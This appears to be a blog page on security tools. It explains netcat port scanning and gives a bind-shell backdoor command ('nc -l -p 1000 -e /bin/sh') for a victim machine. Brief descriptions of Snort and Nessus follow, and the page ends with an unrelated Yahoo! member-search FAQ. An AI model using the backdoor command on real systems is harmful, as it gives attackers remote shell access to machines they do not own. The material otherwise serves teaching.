Netcat

How many times did you come across a blog/post that calls netcat a “swiss army knife”? Netcat is probablly a swiss army knife, but on steroids. It is a must have tool in your personal toolkit. If you haven’t had your first joy ride with netcat, read on, this post is for you.

Netcat allows you to read and write data across TCP and UDP sockets. That’s it, nothing else. In the simplicity of this utility, lies its very strength. Let us look at some of the very cool stuff that netcat is capable of:

Netcat is your port scanner: Yes, it can be a worthy port scanner and you can port scan a host using the following syntax:

nc -v -w2 -z scanme.org 20-40

-v makes the output verbose (add another v to increase the verbosity)

-w specifies that netcat should wait the specified number of seconds, before it decides that the attempt was useless.

-z ensures that netcat does not send any data to the listening ports.

20-40 is the port range that netcat is going to sprawl through.

Netcat is a backdoor: OK, I don’t want to sound like guys selling you a vegitable crusher over a broadcasting shopping channel and bragging about the fact that how it can crush carrots and cabbages at the same time. But netcat is even more versatile then that. It is often used as a backdoor by crackers. Following syntax (on victim machine) will run an instance of netcat listening on port 1000:

nc -l -p 1000 -e /bin/sh

-l instructs the netcat binary to be in listen mode, waiting for inbound connections

-p specifies the port number i.e. 1000

-e specifies the program or a binary that it should run after successful connection i.e. a shell (/bin/sh)

The attacker can connect back to the victim machine, on the specified port, using another netcat instance on his machine:

nc -v victim_IP 1000

victim_IP is the IP of the machine where the netcat was previously executed with -l and -e options. Ofcourse, the attacker has to figure out a way first to upload the netcat binary onto the victim’s machine.
SITE LINK::
OFFICIAL SITE

Snort

Snort is an open source network intrusion prevention and detection system (IDS/IPS) developed by Sourcefire. Combining the benefits of signature, protocol and anomaly-based inspection, Snort is the most widely deployed IDS/IPS technology worldwide. With millions of downloads and approximately 300,000 registered users, Snort has become the de facto standard for IPS.
checkout the link below..
Official site

NESSUS vulnerability assessment tool

The Nessus vulnerability scanner is the world-leader in active scanners, featuring high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs and across physically separate networks.

How do I search for a Yahoo! member?

It's easy to find a Yahoo! member. Go to the Yahoo! Member Directory(http://ca.members.yahoo.com) and find the area marked "Find People on Yahoo!" at the top of the page.

You can search by Yahoo! ID, real name, or keywords. Enter your search term into the box and check the appropriate option below. When you are done making your selections, then click the "Find" button to bring up the results.

The Yahoo! Member Directory search can only display up to 500 results for each query. If you would like to see additonal profiles you may need to increase your search criteria or try using the advanced search.

Note: Some public profiles will not show up in a Member Directory search, depending on weather or not the owner of that profile has chosen to make that profile publically searchable.